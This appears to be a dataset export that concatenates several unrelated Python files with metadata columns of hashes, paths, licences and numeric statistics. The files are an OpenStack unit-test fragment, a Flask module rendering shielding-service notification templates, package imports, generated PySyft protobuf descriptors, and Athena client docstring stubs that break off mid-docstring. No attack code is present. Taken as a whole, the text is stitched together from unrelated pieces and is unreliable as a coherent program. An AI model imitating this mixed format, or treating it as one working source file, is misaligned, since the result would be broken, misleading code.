os_net.update_ip.side_effect = os_exc.SDKException
fip = munch.Munch({'floating_ip_address': '1.2.3.5',
'id': 'ec29d641-fec4-4f67-928a-124a76b3a888'})
service_pub_ip_info = (obj_lbaas
.LBaaSPubIp(ip_id=fip.id,
ip_addr=fip.floating_ip_address,
alloc_method='pool'))
self.assertRaises(os_exc.SDKException, cls.disassociate_pub_ip,
m_driver, service_pub_ip_info)
| 44.695522
| 79
| 0.618714
| 1,835
| 14,973
| 4.671935
| 0.107357
| 0.040826
| 0.05319
| 0.07092
| 0.869591
| 0.846611
| 0.81815
| 0.80217
| 0.793305
| 0.763443
| 0
| 0.038257
| 0.296467
| 14,973
| 334
| 80
| 44.829341
| 0.775584
| 0.040206
| 0
| 0.782101
| 0
| 0
| 0.084494
| 0.045974
| 0
| 0
| 0
| 0
| 0.070039
| 1
| 0.070039
| false
| 0
| 0.035019
| 0
| 0.108949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a4e084b2645a119068723676c33b0e1cab5d700
| 3,231
|
py
|
Python
|
vulnerable_people_form/integrations/notification_content.py
|
StephenGill/govuk-shielded-vulnerable-people-service
|
fbb74de933ffd3080c84611de067ba336bfa5518
|
[
"MIT"
] | null | null | null |
vulnerable_people_form/integrations/notification_content.py
|
StephenGill/govuk-shielded-vulnerable-people-service
|
fbb74de933ffd3080c84611de067ba336bfa5518
|
[
"MIT"
] | null | null | null |
vulnerable_people_form/integrations/notification_content.py
|
StephenGill/govuk-shielded-vulnerable-people-service
|
fbb74de933ffd3080c84611de067ba336bfa5518
|
[
"MIT"
] | null | null | null |
from flask import render_template
from vulnerable_people_form.form_pages.shared.session import form_answers, is_nhs_login_user
def create_spl_no_match_email_content(reference_number):
return render_template(
"_spl_no_match_email_template.md",
first_name=form_answers()["name"]["first_name"],
last_name=form_answers()["name"]["last_name"],
reference_number=reference_number,
has_someone_to_shop=form_answers().get("do_you_have_someone_to_go_shopping_for_you"),
told_to_shield=form_answers()["nhs_letter"],
)
def create_spl_no_match_sms_content(reference_number):
return render_template(
"_spl_no_match_sms_template.txt",
first_name=form_answers()["name"]["first_name"],
last_name=form_answers()["name"]["last_name"],
reference_number=reference_number,
has_someone_to_shop=form_answers().get("do_you_have_someone_to_go_shopping_for_you"),
told_to_shield=form_answers()["nhs_letter"],
).replace("\n", "")
def create_spl_no_match_letter_content(reference_number):
return render_template(
"_spl_no_match_letter_template.md",
first_name=form_answers()["name"]["first_name"],
last_name=form_answers()["name"]["last_name"],
reference_number=reference_number,
has_someone_to_shop=form_answers().get("do_you_have_someone_to_go_shopping_for_you"),
told_to_shield=form_answers()["nhs_letter"],
)
def create_spl_match_email_content(reference_number):
return render_template(
"_spl_match_email_template.md",
first_name=form_answers()["name"]["first_name"],
last_name=form_answers()["name"]["last_name"],
reference_number=reference_number,
has_someone_to_shop=form_answers().get("do_you_have_someone_to_go_shopping_for_you"),
wants_supermarket_deliveries=form_answers().get("priority_supermarket_deliveries"),
wants_social_care=form_answers().get("basic_care_needs"),
has_set_up_account=is_nhs_login_user(),
)
def create_spl_match_sms_content(reference_number):
return render_template(
"_spl_match_sms_template.txt",
first_name=form_answers()["name"]["first_name"],
last_name=form_answers()["name"]["last_name"],
reference_number=reference_number,
has_someone_to_shop=form_answers().get("do_you_have_someone_to_go_shopping_for_you"),
wants_supermarket_deliveries=form_answers().get("priority_supermarket_deliveries"),
wants_social_care=form_answers().get("basic_care_needs"),
has_set_up_account=is_nhs_login_user(),
).replace("\n", "")
def create_spl_match_letter_content(reference_number):
return render_template(
"_spl_match_letter_template.md",
first_name=form_answers()["name"]["first_name"],
last_name=form_answers()["name"]["last_name"],
reference_number=reference_number,
has_someone_to_shop=form_answers().get("do_you_have_someone_to_go_shopping_for_you"),
wants_supermarket_deliveries=form_answers().get("priority_supermarket_deliveries"),
wants_social_care=form_answers().get("basic_care_needs"),
has_set_up_account=is_nhs_login_user(),
)
| 42.513158
| 93
| 0.735067
| 429
| 3,231
| 4.944056
| 0.137529
| 0.145215
| 0.084866
| 0.107496
| 0.956624
| 0.934936
| 0.934936
| 0.91702
| 0.91702
| 0.759547
| 0
| 0
| 0.148561
| 3,231
| 75
| 94
| 43.08
| 0.770992
| 0
| 0
| 0.709677
| 0
| 0
| 0.237078
| 0.16156
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.032258
| 0.096774
| 0.225806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a6652d3cdead536a3ffa2f8dca821498413afc9
| 157
|
py
|
Python
|
src/nlp_datasets/text_to_speech/__init__.py
|
TeaKatz/NLP_Datasets
|
6eeacd0d120ce8d7d1e3da2b40af94006ee1cdf6
|
[
"MIT"
] | null | null | null |
src/nlp_datasets/text_to_speech/__init__.py
|
TeaKatz/NLP_Datasets
|
6eeacd0d120ce8d7d1e3da2b40af94006ee1cdf6
|
[
"MIT"
] | null | null | null |
src/nlp_datasets/text_to_speech/__init__.py
|
TeaKatz/NLP_Datasets
|
6eeacd0d120ce8d7d1e3da2b40af94006ee1cdf6
|
[
"MIT"
] | null | null | null |
from .WordAudioDataset import WordAudioDataset
from .WordAudioDataset import WordAudioWithNegativeSamples
from .Word2SpeechDataset import Word2SpeechDataset
| 39.25
| 58
| 0.904459
| 12
| 157
| 11.833333
| 0.416667
| 0.28169
| 0.366197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013793
| 0.076433
| 157
| 4
| 59
| 39.25
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2a78ede36657404156938ecd2bbfe301f4f38fb9
| 61
|
py
|
Python
|
dql/__init__.py
|
E-G-C/dql
|
fb208cf3033aacc5347a1dc2ebfa9fd5cc7945e0
|
[
"MIT"
] | 3
|
2019-08-26T02:44:11.000Z
|
2022-03-09T21:57:18.000Z
|
dql/__init__.py
|
E-G-C/dql
|
fb208cf3033aacc5347a1dc2ebfa9fd5cc7945e0
|
[
"MIT"
] | 1
|
2019-09-09T15:30:20.000Z
|
2019-11-25T20:54:38.000Z
|
dql/__init__.py
|
E-G-C/dql
|
fb208cf3033aacc5347a1dc2ebfa9fd5cc7945e0
|
[
"MIT"
] | null | null | null |
from .dictQL import DictQL
from .dictQL import DictQL as Dql
| 20.333333
| 33
| 0.803279
| 10
| 61
| 4.9
| 0.5
| 0.408163
| 0.653061
| 0.897959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163934
| 61
| 2
| 34
| 30.5
| 0.960784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
aa69789160f789f70a1dbf0b63d581f712e03079
| 16,312
|
py
|
Python
|
src/syft/proto/grid/messages/transfer_messages_pb2.py
|
dnabanita7/PySyft
|
ce2510e65f5bad382e88806bcde30fa38c3c76c4
|
[
"Apache-2.0"
] | 2
|
2020-10-19T19:18:46.000Z
|
2020-12-07T12:06:30.000Z
|
packages/syft/src/syft/proto/grid/messages/transfer_messages_pb2.py
|
Metrix1010/PySyft
|
6477f64b63dc285059c3766deab3993653cead2e
|
[
"Apache-2.0"
] | 5
|
2020-09-11T05:47:12.000Z
|
2020-10-13T08:36:17.000Z
|
packages/syft/src/syft/proto/grid/messages/transfer_messages_pb2.py
|
Metrix1010/PySyft
|
6477f64b63dc285059c3766deab3993653cead2e
|
[
"Apache-2.0"
] | 1
|
2021-08-19T12:23:01.000Z
|
2021-08-19T12:23:01.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: proto/grid/messages/transfer_messages.proto
"""Generated protocol buffer code."""
# third party
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
# syft absolute
from syft.proto.core.common import (
common_object_pb2 as proto_dot_core_dot_common_dot_common__object__pb2,
)
from syft.proto.core.io import address_pb2 as proto_dot_core_dot_io_dot_address__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name="proto/grid/messages/transfer_messages.proto",
package="syft.grid.messages",
syntax="proto3",
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n+proto/grid/messages/transfer_messages.proto\x12\x12syft.grid.messages\x1a%proto/core/common/common_object.proto\x1a\x1bproto/core/io/address.proto"\x9c\x01\n\x11LoadObjectMessage\x12%\n\x06msg_id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12&\n\x07\x61\x64\x64ress\x18\x02 \x01(\x0b\x32\x15.syft.core.io.Address\x12\x0f\n\x07\x63ontent\x18\x03 \x01(\t\x12\'\n\x08reply_to\x18\x04 \x01(\x0b\x32\x15.syft.core.io.Address"\x89\x01\n\x12LoadObjectResponse\x12%\n\x06msg_id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x13\n\x0bstatus_code\x18\x02 \x01(\x05\x12\x0f\n\x07\x63ontent\x18\x03 \x01(\t\x12&\n\x07\x61\x64\x64ress\x18\x04 \x01(\x0b\x32\x15.syft.core.io.Address"s\n\x11SaveObjectMessage\x12%\n\x06msg_id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12&\n\x07\x61\x64\x64ress\x18\x02 \x01(\x0b\x32\x15.syft.core.io.Address\x12\x0f\n\x07\x63ontent\x18\x03 \x01(\t"\x89\x01\n\x12SaveObjectResponse\x12%\n\x06msg_id\x18\x01 \x01(\x0b\x32\x15.syft.core.common.UID\x12\x13\n\x0bstatus_code\x18\x02 \x01(\x05\x12\x0f\n\x07\x63ontent\x18\x03 \x01(\t\x12&\n\x07\x61\x64\x64ress\x18\x04 \x01(\x0b\x32\x15.syft.core.io.Addressb\x06proto3',
dependencies=[
proto_dot_core_dot_common_dot_common__object__pb2.DESCRIPTOR,
proto_dot_core_dot_io_dot_address__pb2.DESCRIPTOR,
],
)
_LOADOBJECTMESSAGE = _descriptor.Descriptor(
name="LoadObjectMessage",
full_name="syft.grid.messages.LoadObjectMessage",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="msg_id",
full_name="syft.grid.messages.LoadObjectMessage.msg_id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="address",
full_name="syft.grid.messages.LoadObjectMessage.address",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="content",
full_name="syft.grid.messages.LoadObjectMessage.content",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="reply_to",
full_name="syft.grid.messages.LoadObjectMessage.reply_to",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=136,
serialized_end=292,
)
_LOADOBJECTRESPONSE = _descriptor.Descriptor(
name="LoadObjectResponse",
full_name="syft.grid.messages.LoadObjectResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="msg_id",
full_name="syft.grid.messages.LoadObjectResponse.msg_id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="status_code",
full_name="syft.grid.messages.LoadObjectResponse.status_code",
index=1,
number=2,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="content",
full_name="syft.grid.messages.LoadObjectResponse.content",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="address",
full_name="syft.grid.messages.LoadObjectResponse.address",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=295,
serialized_end=432,
)
_SAVEOBJECTMESSAGE = _descriptor.Descriptor(
name="SaveObjectMessage",
full_name="syft.grid.messages.SaveObjectMessage",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="msg_id",
full_name="syft.grid.messages.SaveObjectMessage.msg_id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="address",
full_name="syft.grid.messages.SaveObjectMessage.address",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="content",
full_name="syft.grid.messages.SaveObjectMessage.content",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=434,
serialized_end=549,
)
_SAVEOBJECTRESPONSE = _descriptor.Descriptor(
name="SaveObjectResponse",
full_name="syft.grid.messages.SaveObjectResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name="msg_id",
full_name="syft.grid.messages.SaveObjectResponse.msg_id",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="status_code",
full_name="syft.grid.messages.SaveObjectResponse.status_code",
index=1,
number=2,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="content",
full_name="syft.grid.messages.SaveObjectResponse.content",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b"".decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
_descriptor.FieldDescriptor(
name="address",
full_name="syft.grid.messages.SaveObjectResponse.address",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
create_key=_descriptor._internal_create_key,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=552,
serialized_end=689,
)
_LOADOBJECTMESSAGE.fields_by_name[
"msg_id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_LOADOBJECTMESSAGE.fields_by_name[
"address"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
_LOADOBJECTMESSAGE.fields_by_name[
"reply_to"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
_LOADOBJECTRESPONSE.fields_by_name[
"msg_id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_LOADOBJECTRESPONSE.fields_by_name[
"address"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
_SAVEOBJECTMESSAGE.fields_by_name[
"msg_id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_SAVEOBJECTMESSAGE.fields_by_name[
"address"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
_SAVEOBJECTRESPONSE.fields_by_name[
"msg_id"
].message_type = proto_dot_core_dot_common_dot_common__object__pb2._UID
_SAVEOBJECTRESPONSE.fields_by_name[
"address"
].message_type = proto_dot_core_dot_io_dot_address__pb2._ADDRESS
DESCRIPTOR.message_types_by_name["LoadObjectMessage"] = _LOADOBJECTMESSAGE
DESCRIPTOR.message_types_by_name["LoadObjectResponse"] = _LOADOBJECTRESPONSE
DESCRIPTOR.message_types_by_name["SaveObjectMessage"] = _SAVEOBJECTMESSAGE
DESCRIPTOR.message_types_by_name["SaveObjectResponse"] = _SAVEOBJECTRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
LoadObjectMessage = _reflection.GeneratedProtocolMessageType(
"LoadObjectMessage",
(_message.Message,),
{
"DESCRIPTOR": _LOADOBJECTMESSAGE,
"__module__": "proto.grid.messages.transfer_messages_pb2"
# @@protoc_insertion_point(class_scope:syft.grid.messages.LoadObjectMessage)
},
)
_sym_db.RegisterMessage(LoadObjectMessage)
LoadObjectResponse = _reflection.GeneratedProtocolMessageType(
"LoadObjectResponse",
(_message.Message,),
{
"DESCRIPTOR": _LOADOBJECTRESPONSE,
"__module__": "proto.grid.messages.transfer_messages_pb2"
# @@protoc_insertion_point(class_scope:syft.grid.messages.LoadObjectResponse)
},
)
_sym_db.RegisterMessage(LoadObjectResponse)
SaveObjectMessage = _reflection.GeneratedProtocolMessageType(
"SaveObjectMessage",
(_message.Message,),
{
"DESCRIPTOR": _SAVEOBJECTMESSAGE,
"__module__": "proto.grid.messages.transfer_messages_pb2"
# @@protoc_insertion_point(class_scope:syft.grid.messages.SaveObjectMessage)
},
)
_sym_db.RegisterMessage(SaveObjectMessage)
SaveObjectResponse = _reflection.GeneratedProtocolMessageType(
"SaveObjectResponse",
(_message.Message,),
{
"DESCRIPTOR": _SAVEOBJECTRESPONSE,
"__module__": "proto.grid.messages.transfer_messages_pb2"
# @@protoc_insertion_point(class_scope:syft.grid.messages.SaveObjectResponse)
},
)
_sym_db.RegisterMessage(SaveObjectResponse)
# @@protoc_insertion_point(module_scope)
| 33.494867
| 1,170
| 0.630824
| 1,719
| 16,312
| 5.631181
| 0.089587
| 0.040496
| 0.060847
| 0.055785
| 0.778512
| 0.766942
| 0.707335
| 0.703202
| 0.703202
| 0.68688
| 0
| 0.034901
| 0.272805
| 16,312
| 486
| 1,171
| 33.563786
| 0.78115
| 0.034576
| 0
| 0.799559
| 1
| 0.006608
| 0.137999
| 0.103229
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013216
| 0
| 0.013216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aa76793ac46890610864fa1198baf08dec71380f
| 72,246
|
py
|
Python
|
pyboto3/athena.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/athena.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/athena.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def batch_get_named_query(NamedQueryIds=None):
"""
Returns the details of a single named query or a list of up to 50 queries, which you provide as an array of query ID strings. Requires you to have access to the workgroup in which the queries were saved. Use ListNamedQueriesInput to get the list of named query IDs in the specified workgroup. If information could not be retrieved for a submitted query ID, information about the query ID submitted is listed under UnprocessedNamedQueryId . Named queries differ from executed queries. Use BatchGetQueryExecutionInput to get details about each unique query execution, and ListQueryExecutionsInput to get a list of query execution IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.batch_get_named_query(
NamedQueryIds=[
'string',
]
)
:type NamedQueryIds: list
:param NamedQueryIds: [REQUIRED]\nAn array of query IDs.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax{
'NamedQueries': [
{
'Name': 'string',
'Description': 'string',
'Database': 'string',
'QueryString': 'string',
'NamedQueryId': 'string',
'WorkGroup': 'string'
},
],
'UnprocessedNamedQueryIds': [
{
'NamedQueryId': 'string',
'ErrorCode': 'string',
'ErrorMessage': 'string'
},
]
}
Response Structure
(dict) --
NamedQueries (list) --Information about the named query IDs submitted.
(dict) --A query, where QueryString is the list of SQL query statements that comprise the query.
Name (string) --The query name.
Description (string) --The query description.
Database (string) --The database to which the query belongs.
QueryString (string) --The SQL query statements that comprise the query.
NamedQueryId (string) --The unique identifier of the query.
WorkGroup (string) --The name of the workgroup that contains the named query.
UnprocessedNamedQueryIds (list) --Information about provided query IDs.
(dict) --Information about a named query ID that could not be processed.
NamedQueryId (string) --The unique identifier of the named query.
ErrorCode (string) --The error code returned when the processing request for the named query failed, if applicable.
ErrorMessage (string) --The error message returned when the processing request for the named query failed, if applicable.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'NamedQueries': [
{
'Name': 'string',
'Description': 'string',
'Database': 'string',
'QueryString': 'string',
'NamedQueryId': 'string',
'WorkGroup': 'string'
},
],
'UnprocessedNamedQueryIds': [
{
'NamedQueryId': 'string',
'ErrorCode': 'string',
'ErrorMessage': 'string'
},
]
}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
"""
pass
def batch_get_query_execution(QueryExecutionIds=None):
"""
Returns the details of a single query execution or a list of up to 50 query executions, which you provide as an array of query execution ID strings. Requires you to have access to the workgroup in which the queries ran. To get a list of query execution IDs, use ListQueryExecutionsInput$WorkGroup . Query executions differ from named (saved) queries. Use BatchGetNamedQueryInput to get details about named queries.
See also: AWS API Documentation
Exceptions
:example: response = client.batch_get_query_execution(
QueryExecutionIds=[
'string',
]
)
:type QueryExecutionIds: list
:param QueryExecutionIds: [REQUIRED]\nAn array of query execution IDs.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax{
'QueryExecutions': [
{
'QueryExecutionId': 'string',
'Query': 'string',
'StatementType': 'DDL'|'DML'|'UTILITY',
'ResultConfiguration': {
'OutputLocation': 'string',
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
}
},
'QueryExecutionContext': {
'Database': 'string'
},
'Status': {
'State': 'QUEUED'|'RUNNING'|'SUCCEEDED'|'FAILED'|'CANCELLED',
'StateChangeReason': 'string',
'SubmissionDateTime': datetime(2015, 1, 1),
'CompletionDateTime': datetime(2015, 1, 1)
},
'Statistics': {
'EngineExecutionTimeInMillis': 123,
'DataScannedInBytes': 123,
'DataManifestLocation': 'string',
'TotalExecutionTimeInMillis': 123,
'QueryQueueTimeInMillis': 123,
'QueryPlanningTimeInMillis': 123,
'ServiceProcessingTimeInMillis': 123
},
'WorkGroup': 'string'
},
],
'UnprocessedQueryExecutionIds': [
{
'QueryExecutionId': 'string',
'ErrorCode': 'string',
'ErrorMessage': 'string'
},
]
}
Response Structure
(dict) --
QueryExecutions (list) --Information about a query execution.
(dict) --Information about a single instance of a query execution.
QueryExecutionId (string) --The unique identifier for each query execution.
Query (string) --The SQL query statements which the query execution ran.
StatementType (string) --The type of query statement that was run. DDL indicates DDL query statements. DML indicates DML (Data Manipulation Language) query statements, such as CREATE TABLE AS SELECT . UTILITY indicates query statements other than DDL and DML, such as SHOW CREATE TABLE , or DESCRIBE <table> .
ResultConfiguration (dict) --The location in Amazon S3 where query results were stored and the encryption option, if any, used for query results. These are known as "client-side settings". If workgroup settings override client-side settings, then the query uses the location for the query results and the encryption configuration that are specified for the workgroup.
OutputLocation (string) --The location in Amazon S3 where your query results are stored, such as s3://path/to/query/bucket/ . To run the query, you must specify the query results location using one of the ways: either for individual queries using either this setting (client-side), or in the workgroup, using WorkGroupConfiguration . If none of them is set, Athena issues an error that no output location is provided. For more information, see Query Results . If workgroup settings override client-side settings, then the query uses the settings specified for the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .
EncryptionConfiguration (dict) --If query results are encrypted in Amazon S3, indicates the encryption option used (for example, SSE-KMS or CSE-KMS ) and key information. This is a client-side setting. If workgroup settings override client-side settings, then the query uses the encryption configuration that is specified for the workgroup, and also uses the location for storing query results specified in the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration and Workgroup Settings Override Client-Side Settings .
EncryptionOption (string) --Indicates whether Amazon S3 server-side encryption with Amazon S3-managed keys (SSE-S3 ), server-side encryption with KMS-managed keys (SSE-KMS ), or client-side encryption with KMS-managed keys (CSE-KMS) is used.
If a query runs in a workgroup and the workgroup overrides client-side settings, then the workgroup\'s setting for encryption is used. It specifies whether query results must be encrypted, for all queries that run in this workgroup.
KmsKey (string) --For SSE-KMS and CSE-KMS , this is the KMS key ARN or ID.
QueryExecutionContext (dict) --The database in which the query execution occurred.
Database (string) --The name of the database.
Status (dict) --The completion date, current state, submission time, and state change reason (if applicable) for the query execution.
